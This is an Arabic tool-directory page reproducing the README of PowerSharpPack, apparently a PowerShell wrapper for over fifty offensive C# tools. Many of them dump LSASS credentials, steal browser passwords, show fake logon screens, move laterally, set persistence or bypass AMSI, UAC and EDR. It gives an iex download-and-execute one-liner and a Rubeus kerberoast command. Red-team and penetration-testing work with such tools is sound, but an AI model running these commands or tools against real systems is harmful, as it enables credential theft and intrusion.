Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PowerSharpPack — غلاف PowerShell يجمع أكثر من 50 أداة أمنية هجومية بلغة C# لمرحلة ما بعد الاستغلال، وتصعيد الامتيازات، وسحب بيانات الاعتماد، والحركة الجانبية، واستكشاف دليل Active Directory في أنشطة الفريق الأحمر. | Kitploit
أدوات/GitHubGitHub/s3cur3th1ssh1t/powersharppack
تصعيد الامتيازاتأطر الاستغلالتوليد الحمولةالحركة الجانبيةجمع المعلوماتما بعد الاستغلالاختبار الاختراقالفريق الأحمر

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
s3cur3th1ssh1t/powersharppack

PowerSharpPack

غلاف PowerShell يجمع أكثر من 50 أداة أمنية هجومية بلغة C# لمرحلة ما بعد الاستغلال، وتصعيد الامتيازات، وسحب بيانات الاعتماد، والحركة الجانبية، واستكشاف دليل Active Directory في أنشطة الفريق الأحمر.

عرض المستودع
1.7k312منذ سنة واحدةتمت المراجعة من قبل Kitploit

برعاية من

     

PowerSharpPack

العديد من مشاريع CSharp الهجومية المفيدة ملفوفة في PowerShell لسهولة الاستخدام.

لماذا؟ في رأيي الشخصي، PowerShell الهجومي لم يمت بسبب AMSI أو تسجيل النصوص البرمجية أو وضع اللغة المقيدة أو ميزات الحماية الأخرى. يمكن تجاوز أي من هذه الآليات. نظرًا لأن معظم المشاريع الأمنية الهجومية الجديدة والمبتكرة تُكتب بلغة C#، قررت جعلها قابلة للاستخدام في PowerShell أيضًا.

إذن، ما الذي قمت به بشكل أساسي هنا؟

  1. أولاً، استنساخ كل مستودع C#.
  2. جعل الفئات والطرق الرئيسية عامة (public).
  3. بالنسبة لبعض المشاريع، قمت بدمج طلبات السحب (pull requests) بميزات جديدة أو إصلاحات للأخطاء، أو اضطررت إلى إزالة تعليمات environment.exit حتى لا تُقتل عملية PowerShell بأكملها في حال فقدان المعاملات وما إلى ذلك.
  4. بعد ذلك، تجميع كل ملف ثنائي.
  5. ضغط Gzip وترميز Base64 للملف الثنائي المُجمّع، ثم تحميله في PowerShell عبر [System.Reflection.Assembly]::Load($DecompressedDecodedBinary).

إنها عملية سهلة جدًا ولكنها تستغرق وقتًا طويلاً بالنسبة للعديد من المستودعات.

ما هي الأدوات المضمنة؟

Internalmonologue

هجوم المونولوج الداخلي: استرداد تجزئات NTLM دون لمس LSASS

@شكر لـ: https://github.com/eladshamir/Internal-Monologue

Seatbelt

Seatbelt هو مشروع C# يقوم بعدد من "فحوصات السلامة" الأمنية للمضيف ذات الصلة من منظور هجومي ودفاعي.

@شكر لـ: https://github.com/GhostPack/Seatbelt

SharpWeb

مشروع .NET 2.0 CLR لاسترداد بيانات اعتماد المتصفح المحفوظة من Google Chrome وMozilla Firefox وMicrosoft Internet Explorer/Edge.

@شكر لـ: https://github.com/djhohnstein/SharpWeb

UrbanBishop

ينشئ قسم RW محلي في UrbanBishop ثم يعيّن هذا القسم كـ RX في عملية بعيدة. تحميل شيل كود أصبح سهلاً.

@شكر لـ: https://github.com/FuzzySecurity/Sharp-Suite

SharpUp

SharpUp هو منفذ C# لوظائف PowerUp المختلفة.

@شكر لـ: https://github.com/GhostPack/SharpUp

Rubeus

Rubeus هو مجموعة أدوات C# للتفاعل الخام مع Kerberos وإساءة استخدامه.

@شكر لـ: https://github.com/GhostPack/Rubeus && https://github.com/gentilkiwi/kekeo/

SharPersist

مجموعة أدوات الثبات (Persistence) في Windows مكتوبة بلغة C#.

@شكر لـ: https://github.com/fireeye/SharPersist

Sharpview

تنفيذ C# لـ harmj0y's PowerView

@شكر لـ: https://github.com/tevora-threat/SharpView

winPEAS

تحقق من قائمة تصعيد الامتيازات المحلية في Windows من book.hacktricks.xyz

@شكر لـ: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Lockless

Lockless يسمح بنسخ الملفات المقفلة.

@شكر لـ: https://github.com/GhostPack/Lockless

SharpChromium

مشروع .NET 4.0 CLR لاسترداد بيانات Chromium، مثل ملفات تعريف الارتباط وسجل التصفح وبيانات تسجيل الدخول المحفوظة.

@شكر لـ: https://github.com/djhohnstein/SharpChromium

SharpDPAPI

SharpDPAPI هو منفذ C# لبعض وظائف Mimikatz DPAPI.

@شكر لـ: https://github.com/GhostPack/SharpDPAPI && https://github.com/gentilkiwi/mimikatz/

SharpShares

تعداد جميع المشاركات الشبكية في المجال الحالي. يمكنه أيضًا تحليل الأسماء إلى عناوين IP.

@شكر لـ: https://github.com/djhohnstein/SharpShares

SharpSniper

العثور على مستخدمين محددين في الدليل النشط عبر اسم المستخدم وعنوان IP لتسجيل الدخول.

@شكر لـ: https://github.com/HunnicCyber/SharpSniper

SharpSpray

SharpSpray عبارة عن مجموعة تعليمات برمجية بسيطة لتنفيذ هجوم رش كلمات المرور ضد جميع مستخدمي المجال باستخدام LDAP وهو متوافق مع Cobalt Strike.

@شكر لـ: https://github.com/jnqpblc/SharpSpray

Watson

تعداد التحديثات المفقودة (KB) واقتراح ثغرات مفيدة لتصعيد الامتيازات.

@شكر لـ: https://github.com/rasta-mouse/Watson

Grouper2

العثور على ثغرات في نهج المجموعة (Group Policy) في Active Directory.

@شكر لـ: https://github.com/l0ss/Grouper2

Tokenvator

أداة لرفع الامتيازات باستخدام رموز Windows.

@شكر لـ: https://github.com/0xbadjuju/Tokenvator

SauronEye

أداة بحث للعثور على ملفات محددة تحتوي على كلمات محددة، مثل الملفات التي تحتوي على كلمات مرور.

@شكر لـ: https://github.com/vivami/SauronEye

قم فقط بتحميل النص البرمجي الرئيسي باستخدام

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1')

واختر الأداة كمعامل (switch) على سبيل المثال:

PowerSharpPack -seatbelt -Command "AMSIProviders"

alt text

إذا كنت ترغب في تمرير عدة معاملات إلى الملف الثنائي، يمكنك استخدام علامات الاقتباس مثل:

PowerSharpPack -Rubeus -Command "kerberoast /outfile:Roasted.txt"

إذا كنت لا ترغب في تحميل جميع الملفات الثنائية لأي سبب، يمكنك استخدام نصوص PowerShell الفردية لكل ملف ثنائي الموجودة في مجلد PowerSharpBinaries.

المشاريع المتوفرة أيضًا كنصوص PowerShell مستقلة:

SharpCloud

C# بسيط للتحقق من وجود ملفات بيانات اعتماد متعلقة بـ AWS وMicrosoft Azure وGoogle Compute.

@شكر لـ: https://github.com/chrismaddalena/SharpCloud

SharpSSDP

اكتشاف خدمة SSDP.

@شكر لـ: https://github.com/rvrsh3ll/SharpSSDP

DAFT

DAFT: إطار عمل وأدوات تدقيق قواعد البيانات.

@شكر لـ: https://github.com/NetSPI/DAFT

Get-RBCD-Threaded

أداة لاكتشاف مسارات هجوم التفويض المقيد القائم على الموارد (Resource-Based Constrained Delegation) في بيئات Active Directory.

@شكر لـ: https://github.com/FatRodzianko/Get-RBCD-Threaded

SharpGPO-RemoteAccessPolicies

أداة C# لتعداد سياسات الوصول عن بُعد من خلال نهج المجموعة.

@شكر لـ: https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies

SharpAllowedToAct

الاستيلاء على كائن الكمبيوتر من خلال التفويض المقيد القائم على الموارد (msDS-AllowedToActOnBehalfOfOtherIdentity).

@شكر لـ: https://github.com/pkb1s/SharpAllowedToAct

WireTap

مشروع .NET 4.0 للتفاعل مع أجهزة الفيديو والصوت ولوحة المفاتيح.

@شكر لـ: https://github.com/djhohnstein/WireTap

SharpClipboard

مراقب الحافظة (Clipboard) بلغة C#.

@شكر لـ: https://github.com/slyd0g/SharpClipboard

SharpPrinter

اكتشاف الطابعات + التحقق من الثغرات.

@شكر لـ: https://github.com/rvrsh3ll/SharpPrinter

SharpHide

أداة لإنشاء مفاتيح تسجيل مخفية.

@شكر لـ: https://github.com/outflanknl/SharpHide

SpoolSample

أداة إثبات مفهوم لإجبار مضيفي Windows على المصادقة على أجهزة أخرى عبر واجهة MS-RPRN RPC. هذا ممكن عبر بروتوكولات أخرى أيضًا.

@شكر لـ: https://github.com/leechristensen/SpoolSample

SharpGPOAbuse

SharpGPOAbuse هو تطبيق .NET مكتوب بلغة C# يمكن استخدامه لاستغلال حقوق تحرير المستخدم على كائن نهج المجموعة (GPO) لاختراق الكائنات التي يتم التحكم بها بواسطة ذلك GPO.

@شكر لـ: https://github.com/FSecureLABS/SharpGPOAbuse

SharpDump

SharpDump هو منفذ C# لوظيفة Out-Minidump.ps1 من PowerSploit.

@شكر لـ: https://github.com/GhostPack/SharpDump

SharpHound3

جامع بيانات C# لمشروع BloodHound، الإصدار 3.

@شكر لـ: https://github.com/BloodHoundAD/SharpHound3

PostDump

أداة أخرى لعمل minidump لعملية LSASS باستخدام بعض التقنيات لتجنب الكشف.

@شكر لـ: https://github.com/YOLOP0wn/POSTDump

SharpLocker

SharpLocker يساعد في الحصول على بيانات اعتماد المستخدم الحالي من خلال ظهور شاشة قفل Windows مزيفة، ويتم إرسال جميع المخرجات إلى Console مما يعمل بشكل مثالي مع Cobalt Strike.

@شكر لـ: https://github.com/Pickfordmatt/SharpLocker

Eyewitness

EyeWitness مصمم لالتقاط لقطات شاشة لمواقع الويب، وتقديم بعض معلومات رأس الخادم، وتحديد بيانات الاعتماد الافتراضية إن أمكن.

@شكر لـ: https://github.com/FortyNorthSecurity/EyeWitness

FakeLogonScreen

شاشة تسجيل دخول Windows مزيفة لسرقة كلمات المرور.

@شكر لـ: https://github.com/bitsadmin/fakelogonscreen

P0wnedShell

مجموعة أدوات استغلال بعد الاختراق في PowerShell Runspace.

@شكر لـ: https://github.com/Cn33liz/p0wnedShell

Safetykatz

SafetyKatz هو مزيج من نسخة معدلة قليلاً من مشروع Mimikatz لـ @gentilkiwi ومُحمل PE .NET لـ @subTee. قمت بتعديله مرة أخرى بإصدار Mimikatz مشوش خاص بي.

@شكر لـ: https://github.com/GhostPack/SafetyKatz

InveighZero

أداة انتحال/رجل-في-الوسط لـ LLMNR/mDNS/NBNS/DNS/DHCPv6 في Windows بلغة C#.

@شكر لـ: https://github.com/Kevin-Robertson/InveighZero

SharpSploit

SharpSploit هي مكتبة استغلال بعد الاختراق بلغة .NET مكتوبة بلغة C#.

@شكر لـ: https://github.com/cobbr/SharpSploit

Snaffler

أداة لاختبار الاختراق للمساعدة في العثور على الحلوى اللذيذة، بواسطة @l0ss و @Sh3r4 ( تويتر: @/mikeloss و @/sh3r4_hax ).

@شكر لـ: https://github.com/SnaffCon/Snaffler

BadPotato

Printspoofer من itm4ns بلغة C#.

@شكر لـ: https://github.com/BeichenDream/BadPotato

BetterSafetyKatz

فرع من SafetyKatz يجلب ديناميكيًا أحدث إصدار مُجمّع مسبقًا من Mimikatz مباشرة من مستودع gentilkiwi على GitHub، ويُصحح التوقيعات وقت التشغيل ويستخدم SharpSploit DInvoke لتحميل PE في الذاكرة.

@شكر لـ: https://github.com/Flangvik/BetterSafetyKatz

SharpKatz

منفذ C# لأوامر sekurlsa::logonpasswords و sekurlsa::ekeys و lsadump::dcsync من mimikatz.

@شكر لـ: https://github.com/b4rtik/SharpKatz

Gopher

أداة C# لاكتشاف الثمار المنخفضة (low hanging fruits).

@شكر لـ: https://github.com/EncodeGroup/Gopher

SharpOxidResolver

IOXIDResolver من AirBus Security/PingCastle.

@شكر لـ: https://github.com/vletoux/pingcastle/

SharpBlock

طريقة لتجاوز مكتبات الإسقاط النشطة (active projection DLLs) لـ EDR عن طريق منع تنفيذ نقطة الدخول.

@شكر لـ: https://github.com/CCob/SharpBlock

SharpLoginPrompt

ينشئ هذا البرنامج موجه تسجيل دخول لجمع اسم المستخدم وكلمة المرور للمستخدم الحالي. يسمح هذا المشروع لفريق الأحمر بانتحال اسم المستخدم وكلمة المرور للمستخدم الحالي دون لمس LSASS ودون الحصول على صلاحيات المسؤول على النظام.

@شكر لـ: https://github.com/shantanu561993/SharpLoginPrompt

ThunderFox

استرداد البيانات (جهات الاتصال، رسائل البريد الإلكتروني، السجل، ملفات تعريف الارتباط وبيانات الاعتماد) من Thunderbird وFirefox.

@شكر لـ: https://github.com/V1V1/SharpScribbles

StickyNotesExtract

استخراج البيانات من قاعدة بيانات الملاحظات اللاصقة (Sticky Notes) في Windows. يعمل على Windows 10 Build 1607 والإصدارات الأحدث. لا يعتمد هذا المشروع على أي تبعيات خارجية.

@شكر لـ: https://github.com/V1V1/SharpScribbles

SCShell

أداة حركة جانبية غير ملفية (fileless) تعتمد على ChangeServiceConfigA لتشغيل الأوامر.

@شكر لـ: https://github.com/Mr-Un1k0d3r/SCShell

SharpSecDump

منفذ .NET لوظيفة تفريغ SAM البعيد وأسرار LSA من impacket's secretsdump.py.

@شكر لـ: https://github.com/G0ldenGunSec/SharpSecDump

SharpHandler

يعيد هذا المشروع استخدام المقابض المفتوحة لـ lsass لتحليل أو تفريغ minidump لـ lsass، وبالتالي لا تحتاج إلى استخدام مقبض lsass الخاص بك للتفاعل معه.

@شكر لـ: https://github.com/jfmaes/SharpHandler

SharpRDP

تطبيق .NET Console لبروتوكول سطح المكتب البعيد لتنفيذ الأوامر بعد المصادقة.

@شكر لـ: https://github.com/0xthirteen/SharpRDP

SharpMove

مشروع .NET لتنفيذ العمليات عن بُعد بعد المصادقة.

@شكر لـ: https://github.com/0xthirteen/SharpMove

SharpStay

مشروع .NET لتثبيت الثبات (Persistence).

@شكر لـ: https://github.com/0xthirteen/SharpStay

SharpPrintNightmare

تنفيذ C# لثغرة PrintNightmare CVE-2021-1675/CVE-2021-34527.

@شكر لـ: https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare/SharpPrintNightmare

Certify

إساءة استخدام شهادات Active Directory.

@شكر لـ: https://github.com/GhostPack/Certify

Farmer

Farmer هو مشروع لجمع تجزئات NetNTLM في مجال Windows. يحقق Farmer ذلك عن طريق إنشاء خادم WebDAV محلي يتسبب في مصادقة موجه WebDAV المصغر من أي عملاء متصلين.

@شكر لـ: https://github.com/mdsecactivebreach/Farmer

SharpBypassUAC

أداة C# لتجاوز UAC.

@شكر لـ: https://github.com/FatRodzianko/SharpBypassUAC

StandIn

StandIn هي مجموعة أدوات صغيرة للاستغلال بعد الاختراق في AD تعمل على .NET35/45.

@شكر لـ: https://github.com/FuzzySecurity/StandIn

Carbuncle

أداة للتفاعل مع واجهة Outlook أثناء عمليات الفريق الأحمر.

@شكر لـ: https://github.com/checkymander/Carbuncle

Whisker

Whisker هي أداة C# للاستيلاء على حسابات المستخدمين والكمبيوتر في Active Directory من خلال التلاعب بسمة msDS-KeyCredentialLink الخاصة بهم، مما يضيف "بيانات اعتماد الظل" بشكل فعال إلى الحساب المستهدف.

@شكر لـ: https://github.com/eladshamir/Whisker

SharpLdapRelayScan

منفذ C# لـ LdapRelayScan.

@شكر لـ: https://github.com/klezVirus/SharpLdapRelayScan

LdapSignCheck

مشروع C# للتحقق من توقيع LDAP.

@شكر لـ: https://github.com/cube0x0/LdapSignCheck

SharpImpersonation

SharpImpersonation - أداة انتحال هوية المستخدم - عبر Token أو حقن شيل كود.

@شكر لـ: https://github.com/S3cur3Th1sSh1t/SharpImpersonation

SharpWSUS

SharpWSUS هي أداة CSharp للحركة الجانبية عبر WSUS. توجد مدونة مقابلة (https://labs.nettitude.com/blog/introducing-sharpwsus/) تحتوي على معلومات أكثر تفصيلاً حول الأداة وحالة الاستخدام والكشف.

@شكر لـ: https://github.com/nettitude/SharpWSUS

MalSCCM

تسمح لك هذه الأداة بإساءة استخدام خوادم SCCM المحلية أو البعيدة لنشر تطبيقات ضارة على المضيفين الذين تديرهم. لاستخدام هذه الأداة، يجب أن يكون لعملية الحالية صلاحيات المسؤول على خادم SCCM. عادةً ما تحتوي عمليات نشر SCCM على خادم الإدارة والخادم الأساسي على نفس المضيف، وفي هذه الحالة يمكن استخدام المضيف الذي تم إرجاعه من أمر locate كخادم أساسي.

@شكر لـ: https://github.com/nettitude/MalSCCM

KrbRelay

إطار عمل لتوجيه Kerberos.

@شكر لـ: https://github.com/cube0x0/KrbRelay

SharpSCCM

أداة C# للتفاعل مع SCCM.

@شكر: https://github.com/Mayyhem/SharpSCCM

ShadowSpray

أداة لرش بيانات اعتماد الظل عبر مجال بأكمله على أمل إساءة استخدام DACLs من نوع GenericWrite/GenericAll المنسية منذ زمن طويل على كائنات أخرى في المجال.

@شكر: https://github.com/Dec0ne/ShadowSpray

Grouper3

العثور على ثغرات في نهج المجموعة (Group Policy) في Active Directory، ولكن بشكل أفضل مما فعلته Grouper2.

@شكر لـ: https://github.com/Group3r/Group3r

الأخيران هما في الأساس ليسا تجميعات (Assemblies). لكنني بنيت تجميعًا لتنفيذهما من الذاكرة، وهو قابل للتحميل عبر التقنية من هذا المستودع. تقنية أخرى في الخلفية للتنفيذ، لكنها لا تزال مفيدة:

HandleKatz

مُفَرِّغ lsass PIC باستخدام مقابض مستنسخة.

@شكر لـ: https://github.com/codewhitesec/HandleKatz

NanoDump

افرغ LSASS كما تعنيها.

@شكر لـ: https://github.com/helpsystems/nanodump

PPLDump

افرغ ذاكرة عملية PPL باستخدام استغلال على مستوى المستخدم.

@شكر لـ: https://github.com/itm4n/PPLdump

تنزيل الأداة